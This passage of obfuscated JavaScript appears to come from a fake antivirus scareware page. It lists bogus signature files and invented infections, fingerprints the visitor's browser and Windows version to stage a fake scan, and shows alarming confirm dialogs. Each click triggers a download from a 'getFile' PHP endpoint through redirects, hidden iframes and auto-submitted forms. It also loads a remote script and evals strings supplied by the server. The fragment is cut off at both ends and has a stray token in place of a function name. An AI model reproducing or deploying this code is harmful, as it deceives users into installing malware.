"watchdog.sys","mfc71.dll"];vsyzucfgj.ybsdihnqdy.vekhhb=["main.cvd","base002.avc","base002c.avc","base003.avc",
"base003c.avc","base004.avc","base004c.avc","base005.avc",
"base005c.avc","base006.avc","base006c.avc","base007.avc",
"base007c.avc","base008.avc","base008c.avc","base009.avc",
"base009c.avc","base010.avc","base010c.avc","base011.avc",
"base011c.avc","base012.avc","base012c.avc","base013.avc",
"base013c.avc","base014.avc","base014c.avc","base015.avc","base015c.avc",
"base016.avc","base016c.avc","base017.avc","base017c.avc",
"base018.avc","base018c.avc","base019.avc","base019c.avc",
"base020.avc","base020c.avc","base021.avc","base021c.avc",
"base022.avc","base022c.avc","base023.avc","base023c.avc",
"base024.avc","base024c.avc","base025.avc","base025c.avc","base026.avc",
"base026c.avc","base027.avc","base027c.avc","base028.avc",
"base028c.avc","base029.avc","base029c.avc","base030.avc",
"base030c.avc","base031.avc","base031c.avc","base032.avc",
"base032c.avc","base033.avc","base033c.avc","base034.avc",
"base034c.avc","base035.avc","base035c.avc","base036.avc",
"base036c.avc","base037.avc","base037c.avc","base038.avc","base038c.avc",
"base039.avc","base039c.avc","base040.avc","base040c.avc",
"base041.avc","base041c.avc","base042.avc","base042c.avc",
"base043.avc","base043c.avc","base044.avc","base044c.avc",
"base045.avc","base045c.avc","base046.avc","base046c.avc",
"base047.avc","base047c.avc","base048.avc","base048c.avc",
"base049.avc","base049c.avc","base050.avc","ca.avc","ca001.avc",
"ca002.avc","ca003.avc","chuka.avc","daily.avc","dailyc.avc","eicar.avc",
"ext001.avc","ext001c.avc","ext002.avc","ext002c.avc","ext003.avc",
"ext003c.avc","ext004.avc","ext004c.avc","ext005.avc","ext005c.avc",
"ext006.avc","ext006c.avc","ext007.avc","ext007c.avc","ext008.avc",
"ext008c.avc","ext009.avc","ext009c.avc","ext010c.avc","ext011c.avc",
"ext012c.avc","ext013c.avc","ext014c.avc","ext015c.avc","ext999.avc",
"fa.avc","fa001.avc","gen01.avc","gen02.avc","gen03.avc","gen04.avc",
"gen05.avc","gen99.avc","kernel.avc","krn01.avc","krn02.avc",
"krn03.avc","krn04.avc","krn05.avc","krndos.avc","krnengn.avc",
"krnexe.avc","krnexe32.avc","krngen.avc","krnjava.avc",
"krnmacro.avc","krnun01.avc","krnun02.avc","krnun03.avc",
"krnun04.avc","krnunp.avc","mail.avc","ocr.avc","smart.avc",
"unp00.avc","unp01.avc","unp02.avc","unp03.avc","unp04.avc",
"unp05.avc","unp06.avc","unp07.avc","unp08.avc","unp09.avc",
"unp10.avc","unp11.avc","unp12.avc","unp13.avc","unp14.avc",
"unp15.avc","urgent.avc"];vsyzucfgj.mcdpyfqwg.czqooslgu=[["W32.Pykspa.F","Medium"],["Suspicious.MLApp ","Medium"],
["AdvWare.Hotbar","High"],["Backdoor.Win32.Haxdoor.gu","High"],
["W32.Ackantta.B@mm","High"],["W32.Daprosy","Critical"],
["W32.Downadup","High"],["Trojan.Bankpatch.D","Medium"],
["Backdoor.Tidserv","High"],["Suspicious.S.Vundo.2","High"],
["Trojan.Clampi!gen","High"],["W32.Netsky@mm","Medium"],
["W32.Fujacks.CE!inf","Medium"],["Backdoor.Tidserv.K","Critical"],
["W32.Pykspa.F","High"],["Packed.Generic.287","Critical"],
["Trojan.Zeloaces!inf","High"],["Trojan.Vundo!gen5","Critical"],
["Trojan.Thuxeme!inf","Medium"],["Trojan.Zbot!gen5","Medium"],
["Trojan.Spyeye","Medium"],["Trojan.FakeAV!gen16","Medium"]];
var ejnovce={lwdfoujxo:{wyuzwgjduw:"",ypqwtgcq:null,fioqrwmahm:null},
ybsdihnqdy:{lcxtvxt:true,
pdibx:true,
ilsszh:false,
ceetpura:false,
gwiaif:false,
jabnee:false,
vlnlxevh:true,
ucecrorje:0,
jcnzuoxcb:0,
doleqpzp:false}};
ejnovce.jlfketk={ybsdihnqdy:{jpchn:100,ctknnwzjr:10000,weozjbc:200,zqhqjptr:"loading"},
vljjaf:{nyxlfdif:7,jyhifiv:"Antivirus system will be deactivated if your proceed, are you sure?"},
sewikzgsw:{obyncuni:"preLanding",lfpugg:"centralLanding",cofvlef:"postLanding",
hykvknq:"os_label",tannqki:"browser_label",sqtyne:"scantime_label"},
eqyhzija:{gwiqddo:"instruction",ywxhojqa:"step1",mymypetyu:"subDivStep2",
srtdcnj:"subDivStep3",nlhtpr:"step4",xkgxg:"leftBorder",hjwntuqa:"rightBorder",
ourehw:"mainContent",qhegx:"bordersContent",hjumgj:"530",
ddfveuvdu:"39",lejoyyiysl:"9",kzoemfdj:"677",xgclmf:"23",
rtmgnlkter:"0"},
qzezxgpt:{gsmaziccv:".root {\n height: 100%;\n width: 100%;\n}
\n\n.backgroundOpacityLayer {\n background-color: #000000;\n position: absolute;
\n top: 0px
;\n    left: 0px;
\n width: 100%;
\n height: 100%;
\n opacity: 0.75;
\n z-index: 50;
\n -moz-opacity: 0.75;
\n -khtml-opacity: 0.75;
\n filter: progid:DXImageTransform.Microsoft.Alpha( opacity = 75 );
\n}\n\n.foregroundContentLayer {\n position: absolute;\n top: 0px;
\n left: 0px;
\n}\n"}};ejnovce.vthoohtre=function(a){if(ejnovce.pxjhodfim.bflda){if(a){window.location.href="about:blank"}window.parent.window.opener=null;
window.parent.window.close()}else{if(a){document.location.href="about:blank"}top.window.opener=top;
top.window.open("","_parent","");
top.window.close()}};ejnovce.rloogth=function(a){window.onbeforeunload=null;
if(ejnovce.pxjhodfim.bflda){window.location=a}
else{document.location.href=a}};
ejnovce.ffzaugutu=function(){if(ejnovce.eqyhzija.peoabdr.pgoujpi!=false)
{ejnovce.eqyhzija.fktylhovi()}
if(!ejnovce.ybsdihnqdy.doleqpzp)
{ejnovce.ybsdihnqdy.doleqpzp=true;
ejnovce.ybsdihnqdy.jcnzuoxcb++;
if(ejnovce.pxjhodfim.mkbujms){ejnovce.jrexjyfzde()}
else{ejnovce.dzvjije()}
setTimeout("ejnovce.ybsdihnqdy.doleqpzp = false;",1000)}};
ejnovce.dzvjije=function(){var a=ejnovce.bidbcfjpvh();
window.onbeforeunload=null;
window.location=a;
setTimeout("window.onbeforeunload = ejnovce.tvpiithdh.mwfvh;",2000)};
ejnovce.njwup=function(){if(ejnovce.lwdfoujxo.fioqrwmahm==null)
{ejnovce.lwdfoujxo.fioqrwmahm=document.createElement("form");
ejnovce.lwdfoujxo.fioqrwmahm.method="POST";
ejnovce.nzlnnx.tyiuafmkql.appendChild(ejnovce.lwdfoujxo.fioqrwmahm)}
ejnovce.lwdfoujxo.fioqrwmahm.action=ejnovce.bidbcfjpvh();
window.onbeforeunload=null;
ejnovce.lwdfoujxo.fioqrwmahm.submit();
window.onbeforeunload=ejnovce.tvpiithdh.mwfvh};
ejnovce.jrexjyfzde=function()
{if(ejnovce.lwdfoujxo.ypqwtgcq==null){ejnovce.lwdfoujxo.ypqwtgcq=document.createElement("iframe");
ejnovce.lwdfoujxo.ypqwtgcq.setAttribute("style","width:0px; height:0px;
 border: 0px; scrolling:no;");
document.body.appendChild(ejnovce.lwdfoujxo.ypqwtgcq)}
if(ejnovce.pxjhodfim.bflda)
{ejnovce.lwdfoujxo.ypqwtgcq.onreadystatechange=function()
{if(ejnovce.lwdfoujxo.ypqwtgcq.readyState=="interactive")
{setTimeout("window.onbeforeunload = ejnovce.tvpiithdh.mwfvh;",100)}};
window.onbeforeunload=null}
ejnovce.lwdfoujxo.ypqwtgcq.src=ejnovce.bidbcfjpvh()};
ejnovce.dwmjifrr=function()
{var a=ejnovce.bidbcfjpvh();
var b="dialogWidth:2px;
 dialogHeight:2px; dialogTop:1px;
 dialogLeft:1px; edge:Raised; center:1;
 help:0; resizable:1; scroll:1; status:0";window.open(a,"",b)};
ejnovce.bidbcfjpvh=function()
{return window.snyoh.rpwjlte+"build"
+ejnovce.snyoh.julhrmn.gmshzygcd+"_"+ejnovce.snyoh.julhrmn.lqqtxmpri+".php?cmd=getFile&counter="+ejnovce.ybsdihnqdy.jcnzuoxcb+"&"+ejnovce.lwdfoujxo.wyuzwgjduw};
ejnovce.iigstr=function()
{var a=location.search;ejnovce.lwdfoujxo.wyuzwgjduw=a.replace("?","")};
ejnovce.uqcyqfgs={};
ejnovce.uqcyqfgs.dhllkdph=function()
{var b=new Date();var c=b.getHours();
var a=(c>11&&c<24)?"P.M":"A.M";
c=(c>=12&&c<24)?(c-12):c;return b.getDate()+"."+(b.getMonth()+1)+"."+b.getFullYear()+" "+c+":"+b.getMinutes()+" "+a};
ejnovce.pxjhodfim={bflda:false,
xfpvc:false,
ikhbwivqsl:false,
vfukqmp:false,
qowpu:false,
kzimooxdp:false,
kocatuwr:false,
dvhmupr:false,
mkbujms:false,
sajpic:""};
ejnovce.pxjhodfim.oxirzy=function()
{var c=navigator.userAgent.toLowerCase();
ejnovce.pxjhodfim.qowpu=(c.indexOf("opera")!=-1);
ejnovce.pxjhodfim.bflda=!ejnovce.pxjhodfim.qowpu&&((c.indexOf("msie")!=-1))&&window.attachEvent;
ejnovce.pxjhodfim.bflda6=!ejnovce.pxjhodfim.qowpu&&(c.indexOf("msie 6")>-1);
ejnovce.pxjhodfim.bflda7=!ejnovce.pxjhodfim.qowpu&&(c.indexOf("msie 7")>-1);
ejnovce.pxjhodfim.bflda8=!ejnovce.pxjhodfim.qowpu&&(c.indexOf("msie 8")>-1);
ejnovce.pxjhodfim.kzimooxdp=((c.indexOf("firefox")!=-1));
ejnovce.pxjhodfim.mkbujms=(c.indexOf("chrome")>-1);
ejnovce.pxjhodfim.kocatuwr=!ejnovce.pxjhodfim.mkbujms&&(/webkit|khtml/).test(c);
ejnovce.pxjhodfim.dvhmupr=(c.indexOf("konqueror")!=-1);
if(ejnovce.pxjhodfim.kzimooxdp){var d=/firefox\/([0-9\.]*)/ig;
var a=d.exec(c);
ejnovce.pxjhodfim.sajpic=a!=null?a[1]:null}
else{if(ejnovce.pxjhodfim.qowpu){d=/opera\/([0-9\.]*)/ig;
a=d.exec(c);
ejnovce.pxjhodfim.sajpic=a!=null?a[1]:null}
else{if(ejnovce.pxjhodfim.dvhmupr){d=/konqueror\/([0-9\.]*)/ig;
a=d.exec(c);
ejnovce.pxjhodfim.sajpic=a!=null?a[1]:null}
else{if(ejnovce.pxjhodfim.bflda){d=/msie\s([0-9\.]*)/ig;a=d.exec(c);
ejnovce.pxjhodfim.sajpic=a!=null?a[1]:null}
else{if(ejnovce.pxjhodfim.kocatuwr){d=/safari\/([0-9\.]*)/ig;
a=d.exec(c);
ejnovce.pxjhodfim.sajpic=a!=null?a[1]:null;if(a!=null)
{if(a[1]>=312.6&&a[1]<416)
{ejnovce.pxjhodfim.sajpic="1.3.2"}else{if(a[1]>=416&&a[1]<418)
{ejnovce.pxjhodfim.sajpic="2.0.2"}else{if(a[1]>=418&&a[1]<522)
{ejnovce.pxjhodfim.sajpic="2.0.4"}else{if(a[1]>=522&&a[1]<524)
{ejnovce.pxjhodfim.sajpic="3.0.4"}else{if(a[1]>=524&&a[1]<526)
{ejnovce.pxjhodfim.sajpic="3.1.1"}}}}}}}else{if(ejnovce.pxjhodfim.mkbujms)
{ejnovce.pxjhodfim.sajpic=navigator.userAgent.replace(/^.*Chrome\/([\d\.]+).*$/i,"$1")}}}}}}
if(ejnovce.pxjhodfim.bflda&&!ejnovce.pxjhodfim.bflda7)
{try{document.execCommand("BackgroundImageCache",false,true)}catch(b){}}};
ejnovce.pxjhodfim.upeeex=function()
{if(ejnovce.pxjhodfim.sajpic!=null)
{return ejnovce.pxjhodfim.sajpic}
else{return"[Unknown Version]"}};
ejnovce.pxjhodfim.afvzqtrnk=function()
{var a=ejnovce.pxjhodfim.bflda?"Internet Explorer
":ejnovce.pxjhodfim.kzimooxdp?"Firefox
":ejnovce.pxjhodfim.qowpu?"Opera
":ejnovce.pxjhodfim.kocatuwr?"Safari
":ejnovce.pxjhodfim.mkbujms?"Google Chrome
":ejnovce.pxjhodfim.dvhmupr?"Konqueror ":"Unknown Browser ";
return a+ejnovce.pxjhodfim.upeeex()};
ejnovce.cxtuzk={tjzpwmde:false,
fpvrxkunw:false,
ifnyr:false,vklrtao:false,
grjjl:false,wslzxlpim:false,
rqefzbij:false,nukugfdjd:false,
ydaenlueoz:false};
ejnovce.cxtuzk.oxirzy=function(){var a=navigator.userAgent;
ejnovce.cxtuzk.wslzxlpim=(a.indexOf("95")!=-1&&a.indexOf("Win")!=-1);
ejnovce.cxtuzk.rqefzbij=(a.indexOf("98")!=-1&&a.indexOf("Win")!=-1);
ejnovce.cxtuzk.grjjl=(a.indexOf("98")!=-1&&a.indexOf("Win 9x 4.90")!=-1);
ejnovce.cxtuzk.nukugfdjd=(a.indexOf("NT 5.0")!=-1);
ejnovce.cxtuzk.tjzpwmde=(a.indexOf("NT 5.1")!=-1);
ejnovce.cxtuzk.fpvrxkunw=(a.indexOf("NT 5.2")!=-1);
ejnovce.cxtuzk.vklrtao=(a.indexOf("NT 6.0")!=-1);ejnovce.cxtuzk.ifnyr=(a.indexOf("NT 6.1")!=-1);
ejnovce.cxtuzk.ydaenlueoz=(a.indexOf("windows")!=-1||a.indexOf("win32")!=-1)};
ejnovce.cxtuzk.afvzqtrnk=function()
{return
ejnovce.cxtuzk.ifnyr?"Windows 7":
ejnovce.cxtuzk.vklrtao?"Windows Vista":
ejnovce.cxtuzk.tjzpwmde?"Windows XP":
ejnovce.cxtuzk.nukugfdjd?"Windows 2000":
ejnovce.cxtuzk.rqefzbij?"Windows 98":
ejnovce.cxtuzk.wslzxlpim?"Windows 95":
ejnovce.cxtuzk.grjjl?"Windows ME":
ejnovce.cxtuzk.fpvrxkunw?"Windows Server 2003":
ejnovce.cxtuzk.ydaenlueoz?"Windows NT":"Unknown OS"};
ejnovce.nzlnnx={tyiuafmkql:null,ahymqtzzi:null};
ejnovce.nzlnnx.dhkbys=function(b,a)
{var c=document.getElementsByTagName(b);
if(c==undefined){return false}
else{if(c.length==0){return false}}
if(a!=undefined)
{if(c[a]!=undefined)
{return c[a]}else{return false}}
else{return c}};
ejnovce.nzlnnx.njsorhgd=function(b)
{var a=document.getElementById(b);
return a!=undefined?a:false};
ejnovce.nzlnnx.ppl=function(e,d,a,c)
{var b=document.createElement("div");
if(e!=null){b.setAttribute("id",e)}
if(!a){b.style.display="none"}
if(c!=null){b.setAttribute("style",c)}
if(d!=null){b.innerHTML=d}
return b};
ejnovce.nzlnnx.hljylqmh=function(c,b)
{var a=document.getElementById(c);
if(a){a.innerHTML=b}};
ejnovce.nzlnnx.dwndtsj=function(){if(ejnovce.pxjhodfim.bflda)
{var a={width:document.documentElement.clientWidth,height:document.documentElement.clientHeight}}
else{a={width:window.innerWidth,height:window.innerHeight}}
return a};ejnovce.nzlnnx.filtnpxrq=function(){if(ejnovce.pxjhodfim.bflda)
{var
a={width:document.documentElement.scrollWidth,height:document.documentElement.scrollHeight}}
else{a={width:document.body.parentNode.scrollWidth,height:document.body.parentNode.scrollHeight}}
return a};
ejnovce.nzlnnx.jznyxhbxf=function(f,h)
{var c=f.offsetWidth;var j=f.offsetHeight;var e=0;var b=0;
if(ejnovce.pxjhodfim.bflda){e=ejnovce.qzezxgpt.<beep>(f,"marginLeft");
b=ejnovce.qzezxgpt.<beep>(f,"marginTop")}
else{e=ejnovce.qzezxgpt.<beep>(f,"margin-left");
b=ejnovce.qzezxgpt.<beep>(f,"margin-top")}
if(e==null||e=="auto"){e=0}
else{e=Number(e.replace("px",""))}
if(b==null||b=="auto"){b=0}
else{b=Number(b.replace("px",""))}
var d=0;var g=0;if(h=="absolute"){while(f){d+=f.offsetLeft;g+=f.offsetTop;f=f.offsetParent}}
else{if(ejnovce.pxjhodfim.bflda){g=Number(f.style.pixelTop);d=Number(f.style.pixelLeft)}
else{g=f.style.top;d=f.style.left;g=Number(g.replace("px",""));
d=Number(d.replace("px",""))}}d-=e;g-=b;var i=d+c;var a=g+j;
return{left:d,top:g,right:i,bottom:a,width:c,height:j,marginLeft:e,marginTop:b}};
ejnovce.nzlnnx.jetbfkb=function(a,c){var b=document.createElement("script");
c=c||function(){};b.type="text/javascript";b.src=a;
if(ejnovce.pxjhodfim.bflda){b.onreadystatechange=function()
{if(this.readyState=="loaded"||this.readyState=="complete")
{c()}}}else{b.onload=c}ejnovce.nzlnnx.tyiuafmkql.appendChild(b);return b};
ejnovce.nzlnnx.oxirzy=function(){window.onload=function()
{var b=ejnovce.nzlnnx.dhkbys("head",0);
ejnovce.nzlnnx.tyiuafmkql=(b)?b:null;
var a=ejnovce.nzlnnx.dhkbys("body",0);
ejnovce.nzlnnx.ahymqtzzi=(a)?a:null;
ejnovce.qzezxgpt.opcryd=ejnovce.qzezxgpt.qvptjcuv(ejnovce.jlfketk.qzezxgpt.gsmaziccv,false);
ejnovce.nzlnnx.jetbfkb("service.php?"+ejnovce.lwdfoujxo.wyuzwgjduw,ejnovce.snyoh.ljkesoptme)}};
ejnovce.etcgmel={qodpmj:[],lzdviouxk:0};ejnovce.etcgmel.hscawre=function(b,a,d){for(var c=0;c<b.length;
c++){var e=new Image(b[c].width,b[c].height);e.src=b[c].path;
b[c]=e}ejnovce.etcgmel.qodpmj.push({callback:a,isReady:d,list:b,called:false});
if(ejnovce.etcgmel.lzdviouxk==0){ejnovce.etcgmel.lzdviouxk=setTimeout(ejnovce.etcgmel.xmkyhgkyh,ejnovce.jlfketk.ybsdihnqdy.jpchn)}};
ejnovce.etcgmel.xmkyhgkyh=function(){ejnovce.etcgmel.aekb();
for(var c=0;c<ejnovce.etcgmel.qodpmj.length;
c++){if(!ejnovce.etcgmel.qodpmj[c].called){var a=true;for(var b=0;b<ejnovce.etcgmel.qodpmj[c].list.length;
b++)
{if((typeof(ejnovce.etcgmel.qodpmj[c].list[b].naturalWidth)=="number"&&ejnovce.etcgmel.qodpmj[c].list[b].naturalWidth==0)||!ejnovce.etcgmel.qodpmj[c].list[b].complete){a=false;break}}
if(a){if((typeof(ejnovce.etcgmel.qodpmj[c].isReady)=="function"&&ejnovce.etcgmel.qodpmj[c].isReady())||(typeof(ejnovce.etcgmel.qodpmj[c].isReady)!=="function")){ejnovce.etcgmel.qodpmj[c].called=true;
if(typeof(ejnovce.etcgmel.qodpmj[c].callback)=="function"){ejnovce.etcgmel.qodpmj[c].callback()}}}}}ejnovce.etcgmel.lzdviouxk=setTimeout(ejnovce.etcgmel.xmkyhgkyh,
ejnovce.jlfketk.ybsdihnqdy.jpchn)};
ejnovce.etcgmel.aekb=function()
{clearTimeout(ejnovce.etcgmel.lzdviouxk)};ejnovce.snyoh=
{kdmgrdvl:false};ejnovce.snyoh.ljkesoptme=function()
{ejnovce.snyoh.kdmgrdvl=true;
ejnovce.snyoh.julhrmn=window.snyoh.julhrmn;
ejnovce.sewikzgsw.peoabdr.yexzfo=window.snyoh.yexzfo;
ejnovce.sewikzgsw.peoabdr.hbqgppbj=window.snyoh.hbqgppbj;
ejnovce.sewikzgsw.peoabdr.scbjwqa=window.snyoh.scbjwqa;
ejnovce.sewikzgsw.peoabdr.fucsqr=window.snyoh.fucsqr;
ejnovce.sewikzgsw.peoabdr.xwhnnp=window.snyoh.xwhnnp;
if(ejnovce.sewikzgsw.peoabdr.yexzfo)
{ejnovce.qzezxgpt.vmafbvwf=ejnovce.qzezxgpt.qvptjcuv(window.snyoh.oqimu)}
ejnovce.sewikzgsw.peoabdr.baicp=window.snyoh.baicp;
ejnovce.sewikzgsw.peoabdr.sdwgdumkl=window.snyoh.sdwgdumkl||"";
ejnovce.sewikzgsw.peoabdr.nlbdi=window.snyoh.nlbdi;
ejnovce.sewikzgsw.peoabdr.pcuar=window.snyoh.pcuar;
ejnovce.qzezxgpt.jefnuxeho=ejnovce.qzezxgpt.qvptjcuv(window.snyoh.attlpfrm);ejnovce.eqyhzija.peoabdr.pgoujpi=window.snyoh.pgoujpi;
if(ejnovce.eqyhzija.peoabdr.pgoujpi!=false){ejnovce.eqyhzija.peoabdr.qekueqyn=window.snyoh.qekueqyn;
ejnovce.eqyhzija.peoabdr.ltkfzcgkt=window.snyoh.ltkfzcgkt;
ejnovce.eqyhzija.peoabdr.tcbewp=window.snyoh.tcbewp;
ejnovce.qzezxgpt.lylgoe=ejnovce.qzezxgpt.qvptjcuv(window.snyoh.mdtncuemmi)}
ejnovce.sewikzgsw.peoabdr.gshqo=window.snyoh.gshqo;ejnovce.ybsdihnqdy.ceetpura=window.snyoh.qylup;
ejnovce.ybsdihnqdy.gwiaif=window.snyoh.gwiaif;
ejnovce.ybsdihnqdy.jabnee=window.snyoh.ixodo;
ejnovce.ybsdihnqdy.vlnlxevh=window.snyoh.vlnlxevh;
ejnovce.ybsdihnqdy.pdibx=window.snyoh.pdibx;
ejnovce.ybsdihnqdy.lcxtvxt=ejnovce.ybsdihnqdy.pdibx;
ejnovce.snyoh.ieojpdmur()};ejnovce.snyoh.ieojpdmur=function()
{if(ejnovce.ybsdihnqdy.gwiaif)
{alert(window.snyoh.kguoqhlir)}
if(ejnovce.ybsdihnqdy.vlnlxevh)
{ejnovce.sewikzgsw.peoabdr.yexzfo?ejnovce.sewikzgsw.sscfeqj():ejnovce.sewikzgsw.eyrkviwm()}
else{ejnovce.sewikzgsw.peoabdr.yexzfo?ejnovce.sewikzgsw.xwjrnpur():ejnovce.sewikzgsw.zkeyah()}
if(ejnovce.ybsdihnqdy.jabnee)
{ejnovce.tvpiithdh.gaqosayb("mouseup",function(a)
{if(!ejnovce.ybsdihnqdy.lcxtvxt&&!ejnovce.sewikzgsw.peoabdr.doecgpegke)
{ejnovce.tvpiithdh.ejnxcnndrh(a,true,true);
ejnovce.ffzaugutu()}})}if(ejnovce.ybsdihnqdy.pdibx)
{ejnovce.vljjaf.gvhmi()}};ejnovce.sewikzgsw=
{kryoq:null,dqndstamx:null,peoabdr:
{doecgpegke:false,kfymlvalim:false,sskwgmw:false}};
ejnovce.sewikzgsw.fyvovrf=function(){if(ejnovce.ybsdihnqdy.pdibx&&ejnovce.ybsdihnqdy.lcxtvxt)
{ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.ybsdihnqdy.zqhqjptr)
.style.display="none";ejnovce.ybsdihnqdy.lcxtvxt=false}};
ejnovce.sewikzgsw.sscfeqj=function(c)
{c=c||ejnovce.sewikzgsw.tenjvst;var a=function()
{c();setTimeout(function()
{var g=false;var e=false;var d=function()
{g=true;ejnovce.sewikzgsw.peoabdr.hgvdypkcc=true;if(e){ejnovce.sewikzgsw.fcxzcq()}};
var f=function(){e=true;if(g){ejnovce.sewikzgsw.fcxzcq()}};
ejnovce.sewikzgsw.eyrkviwm(f);setTimeout(d,ejnovce.sewikzgsw.peoabdr.hbqgppbj*1000*2)},ejnovce.jlfketk.weozjbc)};
var b=function(){return ejnovce.sewikzgsw.iklqrmn()};
ejnovce.etcgmel.hscawre(ejnovce.sewikzgsw.peoabdr.xwhnnp,a,b)};
ejnovce.sewikzgsw.xwjrnpur=function(a){a=a||ejnovce.sewikzgsw.tenjvst;
a();
ejnovce.etcgmel.hscawre(ejnovce.sewikzgsw.peoabdr.pcuar,null,null);
setTimeout(ejnovce.sewikzgsw.fcxzcq,ejnovce.sewikzgsw.peoabdr.hbqgppbj*1000)};
ejnovce.sewikzgsw.eyrkviwm=function(a){a=a||ejnovce.sewikzgsw.fcxzcq;
if(ejnovce.eqyhzija.peoabdr.pgoujpi!=false){var b=ejnovce.sewikzgsw.peoabdr.pcuar.concat(ejnovce.eqyhzija.peoabdr.tcbewp);var c=function(){var e=ejnovce.sewikzgsw.uwgimbs();
var d=ejnovce.sewikzgsw.tyzaiwg();
return(e&&d)};ejnovce.etcgmel.hscawre(b,a,c)}
else{ejnovce.etcgmel.hscawre(ejnovce.sewikzgsw.peoabdr.pcuar,a,ejnovce.sewikzgsw.uwgimbs)}};
ejnovce.sewikzgsw.zkeyah=function(a){a=a||ejnovce.sewikzgsw.fcxzcq;
if(ejnovce.eqyhzija.peoabdr.pgoujpi!=false)
{ejnovce.etcgmel.hscawre(ejnovce.eqyhzija.peoabdr.tcbewp,null,null)}a()};ejnovce.sewikzgsw.tenjvst=function()
{if(ejnovce.sewikzgsw.peoabdr.yexzfo)
{if(ejnovce.eqyhzija.peoabdr.ipttw)
{return}if(ejnovce.ybsdihnqdy.lcxtvxt)
{ejnovce.sewikzgsw.fyvovrf()}ejnovce.sewikzgsw.peoabdr.doecgpegke=true;ejnovce.qzezxgpt.kiiv(ejnovce.qzezxgpt.vmafbvwf);
if(!ejnovce.sewikzgsw.kryoq)
{var label;
ejnovce.sewikzgsw.kryoq=ejnovce.nzlnnx.ppl(ejnovce.jlfketk.sewikzgsw.obyncuni,ejnovce.sewikzgsw.peoabdr.scbjwqa,true);
ejnovce.nzlnnx.ahymqtzzi.appendChild(ejnovce.sewikzgsw.kryoq);
label=ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.sewikzgsw.hykvknq);if(label){label.innerHTML=ejnovce.cxtuzk.afvzqtrnk()}
label=ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.sewikzgsw.tannqki);
if(label){label.innerHTML=ejnovce.pxjhodfim.afvzqtrnk()}
label=ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.sewikzgsw.sqtyne);if(label){label.innerHTML=ejnovce.uqcyqfgs.dhllkdph()}eval(ejnovce.sewikzgsw.peoabdr.fucsqr)}
else{ejnovce.sewikzgsw.kryoq.style.display="block"}}};
ejnovce.sewikzgsw.qhiusswp=function()
{ejnovce.sewikzgsw.peoabdr.doecgpegke=false;
ejnovce.sewikzgsw.kryoq.style.display="none";
ejnovce.qzezxgpt.bqaijvpdd(ejnovce.qzezxgpt.vmafbvwf)};
ejnovce.sewikzgsw.iklqrmn=function()
{return true};ejnovce.sewikzgsw.fcxzcq=function()
{if(ejnovce.eqyhzija.peoabdr.ipttw)
{return}if(ejnovce.ybsdihnqdy.lcxtvxt)
{ejnovce.sewikzgsw.fyvovrf()}
if(ejnovce.sewikzgsw.peoabdr.doecgpegke){ejnovce.sewikzgsw.qhiusswp()}
ejnovce.qzezxgpt.kiiv(ejnovce.qzezxgpt.jefnuxeho);
ejnovce.sewikzgsw.peoabdr.kfymlvalim=true;if(!ejnovce.sewikzgsw.dqndstamx)
{ejnovce.sewikzgsw.dqndstamx=ejnovce.nzlnnx.ppl(ejnovce.jlfketk.sewikzgsw.lfpugg,
(ejnovce.sewikzgsw.peoabdr.baicp+ejnovce.sewikzgsw.peoabdr.sdwgdumkl),true);
ejnovce.nzlnnx.ahymqtzzi.appendChild(ejnovce.sewikzgsw.dqndstamx);
eval(ejnovce.sewikzgsw.peoabdr.nlbdi);
if(ejnovce.ybsdihnqdy.ceetpura&&ejnovce.pxjhodfim.kzimooxdp){ejnovce.jrexjyfzde()}}
else{ejnovce.sewikzgsw.dqndstamx.style.display="block"}};
ejnovce.sewikzgsw.fiuvgqqaap=function()
{ejnovce.sewikzgsw.peoabdr.kfymlvalim=false;
ejnovce.sewikzgsw.dqndstamx.style.display="none";
ejnovce.qzezxgpt.bqaijvpdd(ejnovce.qzezxgpt.jefnuxeho)};
ejnovce.sewikzgsw.uwgimbs=function()
{return true};ejnovce.sewikzgsw.yxityy=function()
{if(ejnovce.ybsdihnqdy.ceetpura&&(ejnovce.ybsdihnqdy.ucecrorje>=ejnovce.jlfketk.vljjaf.nyxlfdif))
{ejnovce.vthoohtre(true)}var d=ejnovce.sewikzgsw.ciockne("O");
if(d){var a=d[0];var b=d[1];ejnovce.ybsdihnqdy.ucecrorje++;
var c=confirm(a);if((c&&b=="O")||ejnovce.ybsdihnqdy.ceetpura){ejnovce.ffzaugutu();
return false}else{}}};
ejnovce.sewikzgsw.xyplix=function(){ejnovce.sewikzgsw.peoabdr.sskwgmw=false;
ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.sewikzgsw.cofvlef)
.style.display="none"};
ejnovce.sewikzgsw.ciockne=function(c){if(ejnovce.sewikzgsw.peoabdr.gshqo!=null)
{var b=ejnovce.sewikzgsw.peoabdr.gshqo.length;if(b>0&&c==null){var e=Math.floor(Math.random()*b);
return new Array(ejnovce.sewikzgsw.peoabdr.gshqo[e][0],ejnovce.sewikzgsw.peoabdr.gshqo[e][1])}else{if(b>0&&c!=null){var d=new Array();
for(var a=0;a<b;a++)
{if(ejnovce.sewikzgsw.peoabdr.gshqo[a][1]==c){d.push(ejnovce.sewikzgsw.peoabdr.gshqo[a])}}
if(d.length>0){e=Math.floor(Math.random()*d.length);
return d[e]}}}}return false};
ejnovce.eqyhzija={iyrrnqau:null,peoabdr:{ipttw:false}};ejnovce.eqyhzija.cdnvbtet=function()
{ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.ywxhojqa)
.style.display="block";
ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.mymypetyu)
.innerText="Step 2:";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.srtdcnj)
.innerText="Step 3:";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.xkgxg)
.style.height=ejnovce.jlfketk.eqyhzija.kzoemfdj+"px";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.hjwntuqa)
.style.height=ejnovce.jlfketk.eqyhzija.kzoemfdj+"px";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.ourehw)
.style.height=ejnovce.jlfketk.eqyhzija.kzoemfdj+"px";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.qhegx)
.style.height=(ejnovce.jlfketk.eqyhzija.kzoemfdj+1)+"px";if(ejnovce.pxjhodfim.bflda6){ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.nlhtpr)
